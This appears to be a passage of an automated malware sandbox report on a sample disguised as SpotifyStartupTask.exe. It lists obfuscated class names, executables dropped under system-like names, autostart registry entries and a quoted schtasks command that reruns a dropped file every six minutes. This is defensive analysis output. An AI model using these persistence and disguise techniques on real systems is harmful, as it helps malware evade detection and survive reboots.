                              Source: SpotifyStartupTask.exe, iHu4e9FPWaxjI65mMIA.csHigh entropy of concatenated method names: 'YMWFfvVCOU', 'EIsAB2kS1NM4KI27YamY', 'hKKgKOkSw5uRE2ylKHUC', 'B0UHoBkSlf3vl9IppNEV', 'N1dxNpkSD70ChESheJf1', 'FlvFq4kSB6ABvKfccj5x', 'E94', 'P9X', 'vmethod_0', 'tjWk9O56gRd'
                              Source: SpotifyStartupTask.exe, Jq30wJ4Ewxjf9dFNCUk.csHigh entropy of concatenated method names: 'l0T40uwrpv', 'dq04uOrAta', 'LT04fKW44d', 'dW04SFaBiN', 'K344TId8L5', 'PDa4wGj52M', 'x4U4lO6wtJ', 'VR741BGYNc', 'iZx4DiomlC', 'R6d4BMBtDx'
                              Source: SpotifyStartupTask.exe, gZiWN48q8Ds50DmLhvv.csHigh entropy of concatenated method names: 'X0QGrRRFDT', 'SRLVqykYXB95uoVottgk', 'FfA5HWkYctAyogvfMNNK', 'PBUQW2kY4BlYbZrf7CdM', 'Edi8aakYAyCqIpq1HAs0', 'CVgNbUkYW56DcboqxrDN', 'zLkQTMkYeACFC4CEw2fe', 'z0sGpekU5U', 'vQ6G8Zu6FF', 'lqoGGMxAjb'
                              Source: SpotifyStartupTask.exe, xa58JW4no2BBMIv6T9B.csHigh entropy of concatenated method names: 'XCZkFS8MYmr', 'UmHkFTeU8VB', 'ywkkFwhauZx', 'SEHkFlQsV1s', 'KklkF1EpT32', 'tVJkFDamlHw', 'nAXkFBNJv50', 'aSpe2MwgRm', 's13kFn5op92', 'MWJkF39Lrv6'
                              Source: SpotifyStartupTask.exe, J3p3khFw6ASpQmydNSO.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'aPikdCZeNjt', 'Kpik9k3PN1p', 'rgBubIkS3chVFKWZgsjT', 'rTwLi0kShQnBN5JcPHjp', 'EdZrvwkSbuY1c2XBsLNL'
                              Source: SpotifyStartupTask.exe, zfIEL1fcRqmJH4VI2cQ.csHigh entropy of concatenated method names: 'E7gfe0mZcL', 'Qwlfz9Hhmu', 'SFTSp1txH1', 'lm1SkJN1Er', 'UVoS8aCtW3', 'uncSG5UgK5', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: SpotifyStartupTask.exe, BrOYP9TqWcFkfENOJhi.csHigh entropy of concatenated method names: 'zGZTmf2RKI', 'k6r', 'ueK', 'QH3', 'JThTUM7bJN', 'Flush', 'cQJTAlAHSD', 'VegTW8Q6aU', 'Write', 'nrATXLDsWm'
                              Source: SpotifyStartupTask.exe, zUSRKs0vLx9NpvWNSsl.csHigh entropy of concatenated method names: 'q7N0xFsihW', 'fq3mYWkMp48gMgm1VInu', 'AMxf0jksep69VRn4atYt', 'mtS1oAksznPg4CHcmg2f', 'be583UkMkwcyMabfIHUS', 'rQwloBkM8jljE5Jna2rJ'
                              Source: SpotifyStartupTask.exe, Q10aNyKNaOEnS21wWlT.csHigh entropy of concatenated method names: 'jc607FkbJBTIgvpMKQk6', 'dmo0cJkbHNreyoIZWJXR', 'FxJaxTkbaRs7E6I0M5lA', 'BdlpixkbC2EYO7olsrKU', 'method_0', 'method_1', 'KqjKLuw7af', 'YEnKEPaLAw', 'VJHKI8qmCC', 'LNMKOPAGWt'
                              Source: SpotifyStartupTask.exe, BeiNaCKJT9L6nQc3luu.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'ISOkdgyZIu6', 'D5lkdi7P8yY', 'kcp2m5khyYkF9lg1J3cj', 'keerX1khs3afQWdbFPyo', 'LWsAeBkhMoB4eEUVIqol', 'ELDTnRkh622YDfhTxDX3', 'RbHv2AkhqG43V3mKTFvE', 'GvpUKMkhtTBBNTevVYtR'
                              Source: SpotifyStartupTask.exe, b0UCTlOZ8xybhlFAt1A.csHigh entropy of concatenated method names: 'GG5OyTTh2I', 'UpqOsStgMf', 'TvZOMeOMhQ', 'A6uVdZkhjN0YtS3uaeWy', 'rqn5KFkhHrPNLEuN7vZc', 'I3mxHTkhvj7bObjdaEug', 'XMV9FpkhxEnvQkK0OheD', 'VgNPcQkhNATSI27sxVYy', 'LL6X5rkhQUJDNjBanOTq'
                              Source: SpotifyStartupTask.exe, D9jrrBaVuGUpLhLEZnf.csHigh entropy of concatenated method names: 'DkB2xIkDT9EmOJVWhfpR', 'J1SEtvkDfh5v6X6LA063', 'YFkT9ukDSZn9CdxJjx6s', 'xavsQgkDwHk8xvIE2Yt4', 'WohjeWt2Aa', 'XauWSBkD1LJkKKNZ2qYm', 'z5TYNQkDDRm1Fuv5h6c0', 'xtiOKekDBYu17eoojb5W', 'pYnxkcApom', 'WxU7IBkDbekOnJnR3fRl'
                              Source: SpotifyStartupTask.exe, TUcgdXz6KAC3IthBW5.csHigh entropy of concatenated method names: 'r6PkkT7v9L', 'gDAkG64OXM', 'Pvsk9xnwIE', 'DkBk20priN', 'pfWkFih52u', 'XC6krfCEHl', 'CLSkareWq9', 'Gfqk8wk7FhdtLFMLlgmb', 'HZt44qk7raeUjFLbuuxD', 'pDdy7Pk7d6ohne8I3MKF'
                              Source: SpotifyStartupTask.exe, V4SrglTlhe65u4ks7Z3.csHigh entropy of concatenated method names: 'Close', 'qL6', 'XQ8TDMAiMv', 're3TBDE6CL', 'o6cTnXs00I', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: SpotifyStartupTask.exe, OPimoma8mWHSNfekqvI.csHigh entropy of concatenated method names: 'WIMa9282HQ', 'wGXa2lfPQV', 'D5FaFZ5GOR', 'G17ar7cFKi', 'kmWadyw3QO', 'LR2aae2nZ3', 'PQlaCUyBkB', 'd3yaJ3TnJ9', 'BGkaHpvdaN', 'LgSaviUeMB'
                              Source: SpotifyStartupTask.exe, oPjqs6dQRUHQDyLdMWE.csHigh entropy of concatenated method names: 'ES3dOKXgdx', 'FQbURCkwSO50IO8KEV6d', 'QyLC2Rkwu9X3f15sbJYW', 'mGPcHokwfGuIpY1PFK46', 'dmnjqqkwTZDkniTXvGtX', 'cWQdEbmonS', 'y0H5RKkwY1nTivjP1w8v', 'OelmKSkwR6ZUbkJRpaUE', 'O1SXS9kw76lqyACbDsij'
                              Source: SpotifyStartupTask.exe, RmVOjLIBblSJmpS0q3V.csHigh entropy of concatenated method names: 'KltIyjQnpn', 'aGkIsetvMg', 'g66IMO0J1t', 'QCkS12k3FsSUn7NAjKFu', 'bSoNdqk3rkBgGjvN6s26', 'BLuyPrk3905etSQ2gaXg', 'AKC1vMk32wjrXQUH9Op0', 'jLZI3SwfST', 'WLxIhmikH1', 'Eu2IbvOJb3'
                              Source: SpotifyStartupTask.exe, Bg9T7A9SKUFGSbwxAjB.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'cIpkd9O3isH', 'Kpik9k3PN1p', 'jmN9VwkufBFp6Ss7U7pM', 'cg14cikuS7W5TC6FRmBS', 'ljaxoDkuTWcwE3dEWUbe', 'mBg33ckuwGp8bBUTQIcq', 'tyv5I5kul5SLZZGlOSUO'
                              Source: SpotifyStartupTask.exe, QyvvOLUfTKRRoGBFBPb.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'AoIUT9EanC', 'zRPbHIkWY3QeQCpU1rLL', 'aC4YVWkW0dTWL2hG0jwq', 'uA0RJokWutXQZbESC3Ij', 'bJNGBykWftatYbO2HnRA', 'n5LKrNkWSnpgyykP6dmm', 'a5iCwJkWTPoRtf35nMCL'
                              Source: SpotifyStartupTask.exe, eYMCBhGqKImjPYh16ME.csHigh entropy of concatenated method names: 'jmF9GWq33K', 'U5299wqmPD', 'yku92Ny4Hq', 'lgTxaHkuG6JLnySm3GC0', 'Hm1YFhku9i8yICxPCKWT', 'OYMdNHkukdawZn4Ey8km', 'hY6uTOku8jwwPio1OJfp', 'h939JfsysJ', 'EaAo2qkuFf8GhRxWmNY5', 'RvLQH7kurKt2YZCXZUU9'
                              Source: SpotifyStartupTask.exe, prUfBrBfDxCuxc1GJ5O.csHigh entropy of concatenated method names: 'vWQBTFagGc', 'yhyBweHa6G', 'MJjBlWl3mv', 'rGoB1c2MuP', 'DTLBD1DpVG', 'RyCBBRpVZs', 'HgbBnHhm7C', 'QR2B3ferFe', 'cYABhG2fYc', 'VGYBbowTfY'
                              Source: SpotifyStartupTask.exe, PP9UG2Fh2QcUn5dsnV1.csHigh entropy of concatenated method names: 'lWuFWdiYfb', 'oWTFXITIGV', 'VAvFcHH3IR', 'yIkhRRkTG2OOkKJFuIpV', 'JtYpDTkT9oZ74hbSBhbs', 'GDmoJbkTkOYRxcBKIUvM', 'hrRQnekT89ia2yDxh42Y', 'u8tFZaLK6w', 'sZBF5TlVmq', 'L9yFyiTPYn'
                              Source: SpotifyStartupTask.exe, nPFQkm9nZsJcGimHK0B.csHigh entropy of concatenated method names: 'oFO946kB7Q', 'DO4M60kfGENVh9keWyx2', 'bO4yHJkf978LkgpB0iEr', 'sh7rsOkfkK3CpFVraPyx', 'fQvrHUkf8PcAQ8QoZJ1D', 'H07xX7kfF2IFN74a0WGN', 'vVJjTokfrvXhkYptblHu', 'nHPkdVkfd7qvaEIXJ3P1', 'FkU2FHky19', 'FgOPUmkfCGidrxLgVjjS'
                              Source: SpotifyStartupTask.exe, rs8LHBVCmLaybQjERjh.csHigh entropy of concatenated method names: 'n6TVfQciEx', 'eLqVHoNvti', 'iaMVv1HEKI', 'F8dVjxvQio', 'g42VxLfrdA', 'GmNVN9GnCP', 'uRhVQ8A6RJ', 'JntVLgtk8U', 'u3CVEpUe6I', 'mBaVIeJ3ya'
                              Source: SpotifyStartupTask.exe, Mo547JO6Bv8NJCKlFAR.csHigh entropy of concatenated method names: 'h15kdQyC1a4', 'M0hOtRVlqs', 'hH5kdLQrmWq', 'Q4PLYakhOxG8rF6XAcmR', 'yMi5HykhK1N34GGg1AiX', 'hblSs1khEjvvJwKxRQw9', 'ENfkP3khIjQAua4r7TgP', 'DrmCTakhggAhw0NMXXVl', 'qReWYPkhiMRtTR80rQaN', 'GnNyYCkhVDf8Enna7dNf'
                              Source: SpotifyStartupTask.exe, XdA1V5dg93oHC7A6TPE.csHigh entropy of concatenated method names: 's2ndVQaJww', 'ltcsV3kwDQl1KC2vXOBy', 'todlPqkwBGuOS5GTiWWR', 'ubFYvHkwnZugIWIm7BYK', 'yxMhALkw3tEj5OCw3CMx', 'eI5hH8kwhntQwuc8fJHI', 'Pm1VbKkwlUi299Fpfg57', 'KGhMQVkw1m0PpOP4mBFq'
                              Source: SpotifyStartupTask.exe, UwYuH4Wvrl03bnbW0b0.csHigh entropy of concatenated method names: 'AUAWNX3ZpC', 'myRWIEVKI9', 'cUyWgidXRJ', 'sRGWiuJuxR', 'NTKWV82w87', 'qGiWPZuouM', 'cdRWoEvEVp', 'd5iWRGxBLr', 'Dispose', 'SVmq6Tkc8MrUU0Cv1mQI'
                              Source: SpotifyStartupTask.exe, gNgcGF2ZixpTjsRuGik.csHigh entropy of concatenated method names: 'Ueo26Zc1Al', 'qV06V4kSkLLRZuP0PteN', 'U9tfn7kS8TFKwg3LWa4l', 'pA1K7ckSGvv0jriIYJiK', 'hsZPmfkS9MKs18W3I22X', 'U1J', 'P9X', 'W6Ek9NpKfDk', 'rVck9QYAjDs', 'USakdrP0mjv'
                              Source: SpotifyStartupTask.exe, S5m56bB53YJbRWuZvl8.csHigh entropy of concatenated method names: 'H99kdPAwGS9', 'DQBBsDdnJX', 'KPaBMfZ7gP', 'EBdB6lNQq4', 'sFswYIkUNYFZsNaOOwq6', 'NjA14gkUQtolmppuZjZm', 'hjuQV9kULTJEir2Gh2vQ', 'VYaY6CkUEkifZMClXvbg', 'x5A0mukUIuwyEd3BS46b', 'b3k0Y3kUONyHC7Ji8sBd'
                              Source: SpotifyStartupTask.exe, VX0sd5u9wQLBjUqxrcF.csHigh entropy of concatenated method names: 'TdSuF9KEpi', 'd0huraBEAL', 'jpSudM9hLu', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'GN3uarg7hw'
                              Source: SpotifyStartupTask.exe, RmBN6kxJrSRVtK2GxVi.csHigh entropy of concatenated method names: 'Dispose', 'wmxxvC2iml', 'Qwqxj2PwYc', 'Rbvxx8e6ao', 'WLgohEkDWHKuok0JHFgD', 'NEa4LSkDXksBZoq7jNey', 'IiXn33kDcNfRt5A9NGfm', 'Pphb6lkD4qafywQ1Ac7h'
                              Source: SpotifyStartupTask.exe, UQX9WYSKGRVYHA1o7pi.csHigh entropy of concatenated method names: 'b9WTjGdEkI', 'Q3Nk4Ikq3yep2qbi2TTF', 'm2oxVckqhAxmmQsJNhjq', 'UmmWOEkqbVLITCmFELSi', 'kt5', 'VYRSi9Rcav', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                              Source: SpotifyStartupTask.exe, WA15tnoUUF5aMgJBHag.csHigh entropy of concatenated method names: 'oaSoWk5cm7', 'kXZoXAxL2K', 'Ii4ocD8bae', 'temmtWk5XJgGDQ7vWxSp', 'KRn5Axk5AEm9r4fDuvbx', 'YdOd1Ck5WGNRftH61GSf', 'AiFJWKk5cKtl5SYGHMjM', 'T63GCgk54ve3vmfpPihJ', 'hNmNFDk5edcLsbsqQwce'
                              Source: SpotifyStartupTask.exe, QHD5JAdCxiiR9PdMoqg.csHigh entropy of concatenated method names: 'nMpdHmymcM', 'G4PdvmIpQy', 'YJOdj16sFb', 'e0UARokwKCQq12OsNI3W', 'wBeHOGkwgwFmKktLILHw', 'DBLxNXkwIWhoEf784gN7', 'gh2sIRkwOGg7fW8tQmYb', 'IMaLjKkwicd3qfh4S4ik', 'tVrW3RkwVkos7GQtFS0V', 'DdF2otkwPIGmyU7uBu6k'
                              Source: SpotifyStartupTask.exe, i1HSLS8O3HOWJpf1xjr.csHigh entropy of concatenated method names: 'XrX8gtIk3K', 't0O8iFMnKk', 'h5GVRNkYVe5dLOD7Jgio', 'eH9GkTkYg4SKd8Ed1Nkh', 'sAv5VNkYiya4fRymFZ1S', 'TxfRZTkYPgK2ukCjKG19', 'eGCuj8kYobI2PQ8eckE3', 'eeH48SkYRcSot2eirQ7S', 'MwQ9eLkY7HX53VsJO1p7', 'LdIZ0lkYYTybyS9jDdid'

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Drops PE files with benign system names
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exeJump to dropped file
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: unknownExecutable created and started: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: unknownExecutable created and started: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: unknownExecutable created and started: C:\Windows\DiagTrack\dwm.exe
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\Rlqiwetw.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Program Files\7-Zip\Lang\winlogon.exeJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\jWsFKvpe.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exeJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\LWyBOcEb.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\vRRUHqel.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\PMosVZFV.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\clyyMyKw.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\GFwKqCZT.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\DUQujoOa.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\XUwHpYfn.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\YjeiZtnk.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\wcHMhvIM.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\eKApnDyW.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\sMvnZGVS.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\YqxhFSUC.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\DiagTrack\dwm.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\XUwHpYfn.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\GFwKqCZT.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\vRRUHqel.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\eKApnDyW.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\DUQujoOa.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\Rlqiwetw.logJump to dropped file
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile created: C:\Users\user\Desktop\YjeiZtnk.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\wcHMhvIM.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\clyyMyKw.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\sMvnZGVS.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\YqxhFSUC.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\PMosVZFV.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\LWyBOcEb.logJump to dropped file
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile created: C:\Users\user\Desktop\jWsFKvpe.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNXeqwRJ1WmUZJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNXeqwRJ1WmUZJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTaskJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PQ4HCWgZazguIsFyU1PhJJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6AJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNXeqwRJ1WmUZJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNXeqwRJ1WmUZJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6AJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6AJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6AJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6AJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PQ4HCWgZazguIsFyU1PhJJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PQ4HCWgZazguIsFyU1PhJJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwmJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTaskJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTaskJump to behavior
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTaskJump to behavior
